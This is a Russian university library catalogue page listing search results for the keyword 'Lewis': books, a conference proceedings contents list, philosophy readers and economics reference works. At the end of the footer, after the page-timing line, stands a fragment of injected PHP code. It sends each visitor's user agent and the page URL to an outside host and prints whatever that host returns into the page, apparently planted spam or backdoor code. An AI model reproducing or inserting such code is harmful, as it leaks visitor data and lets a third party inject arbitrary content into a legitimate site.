Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

40 пользователей


Зарегистрированных: 1 

Полуаршинов Александр Владимирович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ЛЬЮИС")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 23
1. 
Гиленсон, Борис Александрович. Синклер Льюис : (100 лет со дня рождения) / Б. А. Гиленсон, 1985. - 64 с.
Ключевые слова 
2. 
Падни, Джон. Льюис Кэрролл и его мир / Д. Падни, 1982. - 100 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
3. 
Падни, Джон. Льюис Кэрролл и его мир / Д. Падни, 1982. - 100 с.
Ключевые слова 
4. 
Человек и мир [Электронный ресурс] : учеб. электрон. изд. локального распространения : хрестоматия по философии : в 2 кн. / ОмГТУ; сост.: В. О. Бернацкий [и др.] ; под ред. В. О. Бернацкого. Кн. 2 : Человек и общество, 2012. - 1 o=эл. опт. диск (CD-ROM)
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
5. 
Гиленсон, Борис Александрович. Синклер Льюис : (100 лет со дня рождения) / Б. А. Гиленсон, 1985. - 64 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
6. 
Проблемы сельской малокомплектной школы и пути их решения : тезисы выступлений участников межвузовской конференции (Бийск, 1998) / науч. ред. К. Г. Колтаков, С. М. Жарков, М. П. Жихарев, 1998. - 183 с.
Оглавление 
  • Жарков, Сергей Маркисович. Сельская малокомплектная школа / С. М. Жарков, К. Г. Колтаков. - с.3
  • Зязин, Анатолий Орестович. Педагогическая инженерия / А. О. Зязин. - с.5
  • Падалко, Татьяна Васильевна. Проблемы сельской малокомплектной школы на современном этапе реформирования системы образования / Т. В. Падалко. - с.7
  • Жихарев, Михаил Павлович. О ролевых подходах к экономическому образованию школьников / М. П. Жихарев. - с.9
  • Коржнев, Виктор Николаевич. Особенности изучения основ геологии в малокомплектной школе / В. Н. Коржнев. - с.12
  • Быкова, Н. И. Персональный компьютер в образовании на пороге XXI века / Н. И. Быкова, В. Е. Трубников. - с.13
  • Исаева, Марина Борисовна. К проблеме профессионального становления будущего учителя / М. Б. Исаева. - с.15
  • Рыкова, Людмила Анатольевна. Энергоинформационный подход к разработке образовательных программ / Л. А. Рыкова. - с.18
  • Невзорова, Н. К. Декоративно-прикладное искусство как основное условие эстетического воспитания и художественного образования учащихся / Н. К. Невзорова. - с.20
  • Апанасенко, Ольга Николаевна. Образ малой родины в нравственном воспитании школьников / О. Н. Апанасенко. - с.23
  • Петрищева, Галина Сергеевна. О работе клуба натуралистов-краеведов в малокомплектной школе / Г. С. Петрищева. - с.25
  • Валова, Людмила Борисовна. Система потребностей человека как основа формирования субъективного отношения к природе / Л. Б. Валова. - с.26
  • Поздеев, Юрий Викторович. Беседы по изобразительному искусству в школе / Ю. В. Поздеев. - с.28
  • Рыбакова, Надежда Алексеевна. Уроки музыки в малокомплектной школе / Н. А. Рыбакова. - с.31
  • Назарова, Светлана Николаевна. Роль географии в экологическом образовании / С. Н. Назарова. - с.33
  • Карнаева, Ирина Николаевна. Рисование с натуры / И. Н. Карнаева. - с.35
  • Самосудова, Галина Григорьевна. Льюис Кэрролл и загадки его сказок / Г. Г. Самосудова. - с.36
  • Береснева, Н. Б. Преподавание изобразительного искусства в малокомплектной школе / Н. Б. Береснева. - с.39
  • Косачев, В. Г. Некоторые проблемы преподавания отечественной истории / В. Г. Косачев. - с.41
  • Ярков, Олег Владимирович. Преподавание истории религии в школе / О. В. Ярков. - с.44
  • Илющенко, Светлана Михайловна. О преподавании этики / С. М. Илющенко. - с.46
  • Москвичев, Игорь Иванович. Природа - религия - общество / И. И. Москвичев. - с.47
  • Салин, В. А. К единой культуре человечества / В. А. Салин. - с.52
  • Дерюшев, Владимир Викторович. Авторская программа модульного курса "Введение в социологию" / В. В. Дерюшев. - с.54
  • Шестакова, И. Г. Судьба России в философии К. Н Леонтьева / И. Г. Шестакова. - с.56
  • Рыков, Владимир Владимирович. Гносеологические проблемы формирования нового мировоззрения у школьников / В. В. Рыков. - с.57
  • Брагина, Татьяна Андреевна. К вопросу об использовании исторических сведений на уроках русского языка и чтения в малокомплектной школе / Т. А. Брагина, Д. К. Лопарева. - с.62
  • Колтаков, Константин Георгиевич. Математический кружок в малокомплектной школе / К. Г. Колтаков. - с.65
  • Кульбякина, Лариса Яковлевна. Обучение младших школьников решению простых текстовых сюжетных задач / Л. Я. Кульбякина, Н. И. Беляева. - с.67
  • Кульбякина, Лариса Яковлевна. Межпредметные связи на уроках математики в начальной школе / Л. Я. Кульбякина, Т. Н. Зотова. - с.70
  • Кульбякина, Лариса Яковлевна. Лингвистический аспект обучения математике в начальной школе / Л. Я. Кульбякина, О. В. Евтушенко. - с.72
  • Рыжикова, Ольга Георгиевна. Использование таблиц при решении задач алгебраическим методом / О. Г. Рыжикова. - с.73
  • Коржнева, Светлана Ивановна. Фронтальная работа на однопредметных уроках по русскому языку / С. И. Коржнева. - с.75
  • Будаева, Любовь Николаевна. Использование таблиц при проведении однопредметного урока математики в сельской малокомплектной школе / Л. Н. Будаева. - с.76
  • Островская, Елена Валерьевна. Сочинения разных типов в малокомплектной школе / Е. В. Островская. - с.78
  • Шкуропацкая, Марина Геннадьевна. Функциональный подход к изучению языка в новых школьных программах лингвистического профиля / М. Г. Шкуропацкая. - с.79
  • Никишаева, Валерия Петровна. Об одной из форм экзамена по русскому языку в сельской малокомплектной школе / В. П. Никишаева. - с.82
  • Чиркова, Людмила Ивановна. Орфографический разбор как прием предупреждения ошибок / Л. И. Чиркова. - с.84
  • Байрамова, Тамара Федоровна. О роли работы над диалектными ошибками в речи учащихся / Т. Ф. Байрамова. - с.87
  • Кокая, Лилия Аркадьевна. О подготовке сельских школьников к вступительному экзамену по русскому языку / Л. А. Кокая, Г. П. Радченко. - с.90
  • Моисеева, Людмила Илиодоровна. Изучение диалектизмов на факультативе по русскому языку в сельской малокомплектной школе / Л. И. Моисеева. - с.93
  • Акимова, Алла Ивановна. Использование словообразовательного анализа при изучении орфограмм / А. И. Акимова. - с.95
  • Лучкина, Е. Н. Проблемы преподавания русского языка и литературы в условиях малокомплектной школы / Е. Н. Лучкина. - с.97
  • Арчакова, А. И. О синонимии двусоставных и односоставных предложений в русском языке / А. И. Арчакова. - с.99
  • Шматина, О. Ф. О работе со словарями на уроках русского языка / О. Ф. Шматина. - с.101
  • Жукова, Татьяна Валериевна. К вопросу о развивающем обучении на уроках русского языка / Т. В. Жукова. - с.104
  • Ковалева, Марина Александровна. Поэзия обэруитов и современная детская литература / М. А. Ковалева. - с.105
  • Кукарина, В. А. Проблема преподавания литературы в малокомплектной школе / В. А. Кукарина. - с.108
  • Заика, Виктор Васильевич. Вариативное содержание курса планиметрии как средство активизации познавательной деятельности учащихся / В. В. Заика. - с.111
  • Заворуева, Валентина Георгиевна. Об усилении наглядности при формировании основных понятий начал анализа в малокомплектной школе / В. Г. Заворуева, А. А. Сироткина. - с.112
  • Старовикова, Ирина Владимировна. Виды задач, используемых при обучении математике в 5 - 6-х классах средней школы / И. В. Старовикова. - с.114
  • Тюков, Анатолий Васильевич. Применение детских игрушек на уроках физики в 7 классе / А. В. Тюков, О. С. Мальчукова. - с.117
  • Митрохина, Лидия Михайловна. Задачи с параметрами как средство формирования приемов исследовательской деятельности и познавательной активности учащихся / Л. М. Митрохина, Е. К. Борзенко. - с.118
  • Васильева, Татьяна Дмитриевна. Исторические задачи на уроках математики в сельской малокомплектной школе / Т. Д. Васильева. - с.120
  • Зайцева, Галина Дмитриевна. Обучение учащихся малокомплектной школы самостоятельному поиску плана решения геометрических задач / Г. Д. Зайцева, И. Г. Корнева. - с.121
  • Падюков, Константин Николаевич. Апробация программы трудового обучения учащихся 5 - 9 классов "Сельский дом и семья" / К. Н. Падюков, А. К. Падюков. - с.123
  • Гранкин, С. М. Роль учебного производства в решении проблем сельской малокомплектной школы / С. М. Гранкин, Ю. А. Обидин. - с.124
  • Парубец, Владимир Иванович. Подготовка учителя технологии и предпринимательства к инновационной деятельности / В. И. Парубец, Е. В. Рудакова. - с.127
  • Довыдова, Марина Викторовна. Производительный труд и элементы рыночного производства в малокомплектной сельской школе / М. В. Довыдова. - с.129
  • Рязанов, С. Н. Развивающий характер трудового обучения в условиях малокомплектной школы / С. Н. Рязанов. - с.131
  • Хайло, Владимир Иванович. Дидактические особенности индивидуализации занятий по техническому труду / В. И. Хайло. - с.133
  • Савельева, Г. А. Формирование умений самостоятельной работы у младших школьников на уроках труда / Г. А. Савельева. - с.136
  • Мальцева, Ольга Владимировна. Однотемные уроки труда в малокомплектной школе / О. В. Мальцева. - с.138
  • Фоменко, Н. Е. К проблеме личностного роста учителя малокомплектной школы / Н. Е. Фоменко. - с.139
  • Першина, Наталья Анатольевна. Психологическая служба в малокомплектной школе / Н. А. Першина. - с.141
  • Пищева, Ирина Сергеевна. О возможностях проведения коррекции тревожности учителями малокомплектных школ / И. С. Пищева. - с.144
  • Гарманова, Валентина Филипповна. Профилактика и коррекция ригидности подростков в условиях малокомплектной школы / В. Ф. Гарманова. - с.147
  • Протасова, Ирина Николаевна. Проблема учета когнитивных стилей в процессе обучения / И. Н. Протасова. - с.148
  • Гусева, Татьяна Артуровна. Стили понимания как фактор формирования любознательности учащихся / Т. А. Гусева. - с.151
  • Воротнева, О. В. К проблеме эффективности обучения / О. В. Воротнева. - с.153
  • Базаркина, Елена Владимировна. Развитие любознательности как один из факторов формирования личности учащихся / Е. В. Базаркина. - с.155
  • Фролова, Т. В. Проблема застенчивости у учащихся сельских школ / Т. В. Фролова. - с.157
  • Фролова, Т. В. Работа психолога по профилактике и коррекции акцентуированной степени застенчивости в условиях малокомплектной школы / Т. В. Фролова. - с.159
  • Быкова, Е. И. Формирование самооценки у учащихся в младших классах / Е. И. Быкова. - с.161
  • Андреева, Екатерина Владимировна. К проблеме создания интегративного курса по подготовке специалистов для педагогической деятельности в малокомплектных детских садах / Е. В. Андреева. - с.162
  • Савина, Любовь Александровна. Некоторые аспекты применения компьютера в малокомплектном детском саду / Л. А. Савина. - с.162
  • Медведева, Г. А. Проблема взаимообучения и воспитания детей разновозрастной группы в малокомплектном детском саду / Г. А. Медведева. - с.165
  • Сапцина, Н. П. Организация занятий познавательного цикла в условиях разновозрастной группы / Н. П. Сапцина, В. Ф. Бакасова, Н. А. Катасонова. - с.167
  • Верещагина, Нина Григорьевна. Организация воспитательно-образовательной работы в малокомплектном детском саду с учетом индивидуально-типологических особенностей дошкольников / Н. Г. Верещагина. - с.170
  • Савельева, Надежда Павловна. Актуальные проблемы развития развития речи дошкольников на современном этапе / Н. П. Савельева. - с.172
  • Горшунова, Людмила Алексеевна. Проблемы обучения детей дошкольного возраста на занятиях в малокомплектном дошкольном учреждении / Л. А. Горшунова. - с.175
Держатели документа (Информация об экземплярах) 
7. 
Эхо планеты. - Журнал, 2004г. № 7
Оглавление 
  • Александров, А. Хватит решительных слов, нужны решительные действия / А. Александров. - с.2-4
  • Макарчев, В. Оберточный - так назвали новый архитектурный стиль / В. Макарчев. - с.6
  • Сорокина, С. Американские демократы продолжают борьбу. Пока - за то, чтобы стать кандидатом / С. Сорокина. - с.7
  • Тимофеев, М. Профессиональная армия стоит дорого. Даже дороже, чем думали / М. Тимофеев. - с.8
  • Сорокина, С. Льюис уступает дорогу молодым / С. Сорокина. - с.9
  • Летов, Г. Запуск "Союзов" с экватора профинансирован / Г. Летов, А. Ярушин. - с.10
  • Поляков, А. России кенийский чай пришелся по вкусу / А. Поляков. - с.10-11
  • Арбатов, А. Афганистан: "момент истины" для СССР и России / А. Арбатов, Т. Замятина. - с.12-14
  • Алексей, Карцев. Кто ответит за похоронную ошибку? / Карцев. Алексей. - с.15
  • Кутахов, В. Память о "Варяге" будет жить в граните / В. Кутахов. - с.16-18
  • Головнин, В. Юбилей без парадов и фанфар / В. Головнин. - с.18-19
  • Морозов, Н. "Королева-Солнце" с русской кровью / Н. Морозов. - с.23-27
  • Перов, Г. Как избежать проклятья фараонов / Г. Перов. - с.28-29
  • Джалагония, В. Эпопея "Челюскина". 70-летие подвига / В. Джалагония. - с.30-33
  • Колодочкина, Е. Квартирный вопрос испортил и парижан / Е. Колодочкина. - с.34-36
  • Букалов, А. А Пушкин-то ошибался... / А. Букалов. - с.39
8. 
Человек и мир [Электронный ресурс] : учеб. электрон. изд. локального распространения : хрестоматия по философии : в 2 кн. / ОмГТУ; сост.: В. О. Бернацкий [и др.] ; под ред. В. О. Бернацкого. Кн. 2 : Человек и общество, 2012
Оглавление 
  • Человек и общество. - с.3
  • Философская антропология. - с.3
  • Х. П. Рикман. - с.3
  • О человеческой природе. - с.10
  • Френсис Бэкон. - с.10
  • Жюльен Офре де Ламетри. - с.11
  • Никколо Макиавелли. - с.13
  • О сущности человека. - с.15
  • Владимир Соловьев. - с.15
  • Фридрих Ницше. - с.22
  • О трех превращениях. - с.25
  • О сострадательных. - с.26
  • Макс Шелер. - с.29
  • Счастье как предназначение человека. - с.35
  • Аристотель. - с.35
  • О человеке и его достоинствах. - с.37
  • Жан де Лабрюйер. - с.37
  • О человеке и его добродетелях. - с.37
  • Франсуа де Ларошфуко. - с.37
  • Разум как высшее благо человека. - с.39
  • Луций Анней Сенека. - с.39
  • Предназначение человека и смысл его жизни. - с.42
  • Конфуций. - с.42
  • Любовь как сущностная характеристика человека. - с.46
  • Эрих Фромм. - с.46
  • Владимир Соловьев. - с.49
  • Клайв С. Льюис. - с.60
  • Привязанность. - с.64
  • Игра как сущностная характеристика человека. - с.83
  • Е. Финк. - с.83
  • Человек и техника. - с.87
  • Ж. Эллюль. - с.87
  • О бессмертии и смерти. - с.93
  • Б. Уильямс. - с.93
  • Артур Шопенгауэр. - с.110
  • Чем определяется ход мировой истории?. - с.124
  • Иммануил Кант. - с.124
  • Г. В. Плеханов. - с.126
  • О материалистическом понимании истории. - с.129
  • К. Маркс, Ф. Энгельс. - с.129
  • Карл Маркс. - с.130
  • Карл Маркс. - с.130
  • О законах исторического развития. - с.133
  • Огюст Конт. - с.133
  • Гражданское общество и государство. - с.137
  • Поль Анри Гольбах. - с.137
  • Г. В. Ф. Гегель. - с.146
  • Г. В. Ф. Гегель. - с.147
  • О государственной власти. - с.149
  • Никколо Макиавелли. - с.149
  • Возможен ли прогресс человечества?. - с.153
  • Огюст Конт. - с.153
  • Юзеф Бохеньский. - с.157
  • Альбер Камю. - с.158
  • О смысле истории. - с.161
  • Карл Левит. - с.161
  • Об историческом развитии. - с.170
  • Аврелий Августин. - с.170
  • Френсис Фукуяма. - с.172
  • Карл Поппер. - с.177
  • Многообразие культур, цивилизаций и форм социального опыта. - с.183
  • Карл Ясперс. - с.183
  • Н. Я. Данилевский. - с.186
  • Природа человека и его личность. - с.189
  • Г. Э. Хенсгстенберг. - с.189
Держатели документа (Информация об экземплярах) 
Полный текст
9. 
Человек и мир [Электронный ресурс] : учеб. электрон. изд. локального распространения : хрестоматия по философии : в 2 кн. / ОмГТУ; сост.: В. О. Бернацкий [и др.] ; под ред. В. О. Бернацкого. Кн. 2 : Человек и общество, 2012
Оглавление 
  • Человек и общество. - с.3
  • Философская антропология. - с.3
  • Х. П. Рикман. - с.3
  • О человеческой природе. - с.10
  • Френсис Бэкон. - с.10
  • Жюльен Офре де Ламетри. - с.11
  • Никколо Макиавелли. - с.13
  • О сущности человека. - с.15
  • Владимир Соловьев. - с.15
  • Фридрих Ницше. - с.22
  • О трех превращениях. - с.25
  • О сострадательных. - с.26
  • Макс Шелер. - с.29
  • Счастье как предназначение человека. - с.35
  • Аристотель. - с.35
  • О человеке и его достоинствах. - с.37
  • Жан де Лабрюйер. - с.37
  • О человеке и его добродетелях. - с.37
  • Франсуа де Ларошфуко. - с.37
  • Разум как высшее благо человека. - с.39
  • Луций Анней Сенека. - с.39
  • Предназначение человека и смысл его жизни. - с.42
  • Конфуций. - с.42
  • Любовь как сущностная характеристика человека. - с.46
  • Эрих Фромм. - с.46
  • Владимир Соловьев. - с.49
  • Клайв С. Льюис. - с.60
  • Привязанность. - с.64
  • Игра как сущностная характеристика человека. - с.83
  • Е. Финк. - с.83
  • Человек и техника. - с.87
  • Ж. Эллюль. - с.87
  • О бессмертии и смерти. - с.93
  • Б. Уильямс. - с.93
  • Артур Шопенгауэр. - с.110
  • Чем определяется ход мировой истории?. - с.124
  • Иммануил Кант. - с.124
  • Г. В. Плеханов. - с.126
  • О материалистическом понимании истории. - с.129
  • К. Маркс, Ф. Энгельс. - с.129
  • Карл Маркс. - с.130
  • Карл Маркс. - с.130
  • О законах исторического развития. - с.133
  • Огюст Конт. - с.133
  • Гражданское общество и государство. - с.137
  • Поль Анри Гольбах. - с.137
  • Г. В. Ф. Гегель. - с.146
  • Г. В. Ф. Гегель. - с.147
  • О государственной власти. - с.149
  • Никколо Макиавелли. - с.149
  • Возможен ли прогресс человечества?. - с.153
  • Огюст Конт. - с.153
  • Юзеф Бохеньский. - с.157
  • Альбер Камю. - с.158
  • О смысле истории. - с.161
  • Карл Левит. - с.161
  • Об историческом развитии. - с.170
  • Аврелий Августин. - с.170
  • Френсис Фукуяма. - с.172
  • Карл Поппер. - с.177
  • Многообразие культур, цивилизаций и форм социального опыта. - с.183
  • Карл Ясперс. - с.183
  • Н. Я. Данилевский. - с.186
  • Природа человека и его личность. - с.189
  • Г. Э. Хенсгстенберг. - с.189
Полный текст
10. 
Синченко, Георгий Чонгарович. Парадокс правоблюстителя [Текст] : филос.-правовые эссе / Г. Ч. Синченко, 2010. - 204 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

Семь эссе, написанных в период 1997-2008 гг., представляют изложенное в свободной манере авторское видение ряда ключевых проблем философии права. Для философов, юристов, культурологов, всех, интересующихся историей и философией права и юридической науки.

Полный текст
11. 
Румянцева, Елена Евгеньевна. Мировая экономическая наука в лицах [Текст] : учеб. пособие / Е. Е. Румянцева, 2010. - 454, [1] с.
Ключевые слова 
ЭКОНОМИСТ -- БЕМ-БАВЕРК -- ВАЛЬРАС -- ВИЗЕР -- ВИТТЕ -- КЕНЭ -- ЛИСТ -- МАЛЬТУС -- МАРКС -- МАРШАЛЛ -- МЕНДЕЛЕЕВ -- МИЛЛЬ -- ОУЭН -- ПАРЕТО -- РАДИЩЕВ -- РАТЦЕЛЬ -- РИКАРДО -- СЕЙ -- СЕН-СИМОН -- СИСМОНДИ -- СМИТ -- СПЕРАНСКИЙ -- ТЮРГО -- БЕРДЯЕВ -- БОГДАНОВ -- БУЛГАКОВ -- ВЕБЕР -- ВЕБЛЕН -- ГЭЛБРЕЙТ -- ДМИТРИЕВ -- КАНТОРОВИЧ -- КЕЙНС -- КОММОНС -- КОНДРАТЬЕВ -- КУЗНЕЦ -- ЛЕОНТЬЕВ -- ЛЬЮИС -- МАСЛОУ -- МИД -- МИЗЕС -- РОБИНСОН -- ОЙКЕН -- САВИЦКИЙ -- СЛУЦКИЙ -- СТИГЛЕР -- СТОЛЫПИН -- СТРУМИЛИН -- СТОУН -- ТУГАН-БАРАНОВСКИЙ -- ЧАЯНОВ -- ШУМПЕТЕР -- АБАЛКИН -- АКЕРЛОФ -- АЛЛЕ -- АУМАНН -- БЕККЕР -- БЬЮКЕНЕН -- ГРАНБЕРГ -- КАНЕМАН -- КОУЗ -- МАНДЕЛЛ -- МАРКОВИЦ -- МОДИЛЬЯНИ -- МЮРДАЛЬ -- ПОРТЕР -- СААТИ -- САЙМОН -- СЕН -- СОЛОУ -- СПЕНС -- СТИГЛИЦ -- СЭМЮЭЛЬСОН -- САМУЭЛЬСОН -- ФРИДМЕН -- ЯКОВЕЦ
Держатели документа (Информация об экземплярах) 
12. 
Ивашева, Валентина Васильевна. Судьбы английских писателей [Текст] : диалоги вчера и сегодня / В. В. Ивашева, 1989. - 443, [2] с.
Ключевые слова 
13. 
Нобелевские лауреаты XX века. Экономика [Текст] : Энцикл. слов. / Авт.-сост. Л. Л. Васина, 2001. - 333, [2] с.
Ключевые слова 
Мак-Фаден -- Хекман -- НОБЕЛЕВСКАЯ ПРЕМИЯ -- ПЕРСОНАЛИЯ -- ЭКОНОМИСТ -- ТИНБЕРГЕН -- ФРИШ -- САМУЭЛЬСОН -- КУЗНЕЦ -- ХИКС -- ЭРРОУ -- ЛЕОНТЬЕВ -- МЮРДАЛЬ -- ХАЙЕК -- КАНТОРОВИЧ -- КУПМАНС -- ФРИДМЕН -- МИД -- УЛИН -- САЙМОН -- ЛЬЮИС -- ШУЛЬЦ -- КЛЕЙН -- ТОБИН -- СТИГЛЕР -- ДЕБРЁ -- СТОУН -- МОДИЛЬЯНИ -- БЬЮКЕНЕН -- СОЛОУ -- АЛЛЕ -- ХААВЕЛЬМО -- МАРКОВИЦ -- МИЛЛЕР -- ШАРП -- КОУЗ -- БЕККЕР -- НОРТ -- ФОГЕЛЬ -- ЗЕЛТЕН -- НЭШ -- ХАРШАНЬИ -- ЛУКАС -- ВИКРИ -- МИРРЛИС -- МЕРТОН -- СКОУЛЗ -- СЕН -- МАНДЕЛЛ
Держатели документа (Информация об экземплярах) 
14. 
Человек и мир [Текст] : Хрестоматия по философии / Сост. : В. О. Бернацкий и др.; Под ред. В. О. Бернацкого; ОмГТУ. Кн. 2 : Человек и общество, 2001. - 193 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
15. 
Прист, Стивен. Теории сознания [Текст] / С. Прист; А. Ф. Грязнов, 2000. - 287 с.
Оглавление 
16. 
Актеры зарубежного кино [Текст]. Вып. 5 / сост. В. Михалкович, 1970. - 189, [2] с.
Держатели документа (Информация об экземплярах) 
17. 
Жизнь науки [Текст] : антол. вступлений к классике естествознания / АН СССР, Ин-т истории естествознания и техники, 1973. - 598 с.
Ключевые слова 
ФИЗИКА -- МАТЕМАТИКА -- ХИМИЯ -- РАЗВИТИЕ -- БИОЛОГИЯ -- ФИЗИОЛОГИЯ -- ПАТОЛОГИЯ -- АСТРОНОМИЯ -- КОПЕРНИК -- КЕПЛЕР -- ГИЛБЕРТ -- ВЕЗАЛИЙ -- ЛОМОНОСОВ -- БЕРНУЛЛИ -- ЭЙЛЕР -- НЬЮТОН -- ГАРВЕЙ -- ФРЕНЕЛЬ -- ЛАПЛАС -- МОНЖ -- ГАЛЬВАНИ -- ЛАГРАНЖ -- ЛОРЕНЦ -- ГЕРЦ -- БОЛЬЦМАН -- ГЕЛЬМГОЛЬЦ -- ФАРАДЕЙ -- ГАМИЛЬТОН -- АМПЕР -- КАРНО -- ФУРЬЕ -- ЛЬЮИС -- ВАНТ-ГОФФ -- МЕНДЕЛЕЕВ -- ГАЛЛЕР -- КОЛЬЦОВ -- МОРГАН -- ФРИЗ -- ВЕЙСМАН -- МЕНДЕЛЬ -- ДАРВИН -- КЮВЬЕ -- ЛАМАРК -- ГУМБОЛЬДТ -- ЛИННЕЙ -- ПАСТЕР -- БЕРНАР -- СЕЧЕНОВ -- ВИРХОВ -- БЕРНАДСКИЙ -- ЦИОЛКОВСКИЙ -- ДОКУЧАЕВ -- ПАВЛОВ -- ГИЛЬБЕРТ -- ПУАНКАРЕ -- БУЛЬ -- ЛОБАЧЕВСКИЙ -- КОШИ -- ГАУСС -- ПАУЛИ -- МАНДЕЛЬШТАМ -- ЭЙНШТЕЙН -- БОР -- ПЛАНК -- РЕЗЕРФОРД -- НЕЙМАН
Держатели документа (Информация об экземплярах) 
18. 
Нобелевские лекции - 100 лет. Физиология и медицина [Текст] / редкол.: В. С. Лобанков [и др.]. Т. XIII : 1992-1995, 2006. - 444, [1] с.
Держатели документа (Информация об экземплярах) 
19. 
Нобелевские лекции - 100 лет. Экономика [Текст] / редкол.: В. С. Лобанков [и др.]. Т. II : 1978-1983, 2006. - 415, [1] с.
Держатели документа (Информация об экземплярах) 
20. 
Нобелевские лекции - 100 лет. Литература [Текст] / редкол.: В. С. Лобанков [и др.]. Т. II : 1927-1953Т. II. , 2006. - 512, [1] с.
21. 
Реале, Джованни. Западная философия от истоков до наших дней [Текст]. Т. 4 : От романтизма до наших дней / Ю. А. Кимелев, 1997. - 848, [1] с.
Ключевые слова 
Мегапроект -- Философия -- Философия запада -- Западная философия -- История философии -- Философ -- Романтизм -- Идеализм -- Просветительство -- Фихте -- Шеллинг -- Гегель -- Марксизм -- Маркс -- Кьеркегор -- Позитивизм -- Наука -- Эмпириокритицизм -- Конвенционализм -- Ницше -- Кроче -- Феноменология -- Герменевтика -- Экзистенциализм -- Спиритуализм -- Персонализм -- Гуманитарная наука -- Психоанализ -- Структурализм -- Эпистемология -- Индивид -- Рынок -- Государство -- Политология -- Хайек -- Кейнс -- Поппер -- Новак -- Новая теология -- Неосхоластика -- Розмини -- Джоберти -- Джентиле -- Унамуно -- Ортега-и-гассет -- Арендт -- Бетти -- Рикер -- Парейсон -- Ваттимо -- Виттенштейн -- Бубер -- Левинас -- Льюис -- Куайн -- Уайт -- Гудмен -- Моррис -- Решер -- Бартли -- Грюнбаум -- Рорти -- Патнэм -- Дэвидсон -- Нозик
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2991 - 18.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.63 с.14 запросов, 0.93c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;